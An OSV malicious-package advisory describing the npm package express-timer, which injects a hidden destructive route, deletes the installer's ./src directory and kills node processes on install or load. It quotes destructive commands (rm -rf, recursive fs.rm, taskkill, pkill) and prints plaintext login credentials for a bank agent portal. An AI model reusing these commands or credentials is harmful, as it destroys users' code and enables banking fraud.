MAL-2026-5555

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-timer/MAL-2026-5555.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5555

Published

2026-06-11T02:51:05Z

Modified

2026-06-11T04:01:29.224078265Z

Summary

Malicious code in express-timer (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683)

express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on install or load:

Postinstall backdoor injection (scripts/inject.js): The postinstall hook walks up to the installer's project root, locates the main Express entry file, and appends a hidden route handler app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom();... } }). The injected _boom() recursively deletes the installer's ./src directory (fs.rm(dir, { recursive: true, force: true })) and kills all node processes (taskkill /IM node.exe /F on Windows, pkill -f "node.*<cwd>" on Unix). Any remote actor who hits GET /robots.txt?verify=destroy on the deployed server can wipe the installer's source and crash node processes. The injection persists in the installer's own source tree even after npm uninstall.
Auto-scheduled destruction on require (index.js): package.json sets main: index.js, and that file's top-level code calls scheduleDestructionAfter() with a 1-minute default timer. After 60 seconds, it executes rm -rf <cwd>/src (Unix execSync) or the equivalent fs.rm on Windows, then kills node/PM2 processes. Simply importing the package destroys the consumer's source tree one minute later, with no opt-in, no documented API, and no guard.
Bundled bank-fraud tooling (ibbl_statment.php): The tarball ships a PHP scraper hardcoded with credentials (USER=mohiuddin767272@gmail.com, PASS=Sorifa@2020) for Islami Bank Bangladesh's customer agent portal at https://agent.islamibankbd.com, used to scrape arbitrary customer NIDs, account numbers, and transactions. Unrelated to the advertised purpose; redistributes access to a third-party banking system to anyone who installs the package.

Supporting context: package.json author is the placeholder "Your Name", the description ("Lightweight security helpers for Express") contradicts the actual behavior, and dependencies declares both a self-reference (express-timer: ^1.0.0) and a revealing sibling express-self-destruct1.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005395",
            "versions": [
                "1.0.1"
            ],
            "sha256": "10e5427085b867032f1b16630f04e82e89945022633c39475f30c7855b0fe76f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:51:34Z",
            "import_time": "2026-06-11T03:48:45.85439911Z"
        },
        {
            "id": "IN-MAL-2026-005392",
            "import_time": "2026-06-11T03:48:45.492863604Z",
            "sha256": "6bc13771ab814ced3a28c13a753e6c12a6c1cf760883f034a5a02a867b4ffc8d",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:51:22Z",
            "versions": [
                "1.0.4"
            ]
        },
        {
            "id": "IN-MAL-2026-005394",
            "versions": [
                "1.0.2"
            ],
            "sha256": "7c2b03ef5914ee50d649906c3c1607f9a02334a73b93da3f198ec936a43e4fa7",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:51:30Z",
            "import_time": "2026-06-11T03:48:45.727302846Z"
        },
        {
            "id": "IN-MAL-2026-005393",
            "versions": [
                "1.0.3"
            ],
            "sha256": "18332a53ad8e0030325aea1b7bbdc537a1ee4112d4ed73e464d5181369ee4509",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:51:26Z",
            "import_time": "2026-06-11T03:48:45.604303234Z"
        },
        {
            "id": "IN-MAL-2026-005391",
            "versions": [
                "1.0.5"
            ],
            "sha256": "19d2dea0d7ac642b1921e0ac1bab9fa5ac543437d783764952da75a4b1fba33b",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:51:17Z",
            "import_time": "2026-06-11T03:48:45.36592228Z"
        },
        {
            "id": "IN-MAL-2026-005390",
            "versions": [
                "1.0.6"
            ],
            "sha256": "5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:51:05Z",
            "import_time": "2026-06-11T03:48:45.264878524Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / express-timer

Package

Name: express-timer; View open source insights on deps.dev
Purl: pkg:npm/express-timer

Affected ranges

Affected versions

1.*

1.0.1

1.0.2

1.0.3

1.0.4

1.0.5

1.0.6

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-timer/MAL-2026-5555.json"

indicators

{
    "evidence_files": [
        {
            "path": "scripts/inject.js",
            "sha256": "b1970350a7bc69bef9cf4061fd46571d344e2c11dde87f0e69ea28e983340eae",
            "tlsh": "c7513254c67a4231eef277fd622a0416ba5bd831365151e0b2dc817d3f9247148e2efe"
        },
        {
            "path": "index.js",
            "sha256": "a7e860721fb8d25ad3f46fdb65e0444752f294ee9673c3b9c9480eec4ab432d8",
            "tlsh": "ab1271267cfd60b355f1caa1562b0053f86b8217876cd21936adc36a0fb4158463fdaf"
        },
        {
            "path": "package.json",
            "sha256": "17a21d8755595e763dd71b93d3cf4ccb12f9a2f9abc7fd0bcf16decdcb93e39d",
            "tlsh": "13f08c35a814997711faa6a76c754286b1610f1b11a4dc0e32ba00a88b6265708aefe8"
        }
    ],
    "package_integrity": [
        {
            "filename": "express-timer-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-uKZilAXCZfBrfjJ0AuuCEpfQ4K9rTDjD6Kz5J9yiWSBsciQzS0CRPR/6vnI25gUHr3ouqWXS4GBSnt7wM5JstA==",
                "sha1": "3edb798ac8f379e8c6294446213a8bda504e10cd"
            }
        }
    ]
}

cwes

[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]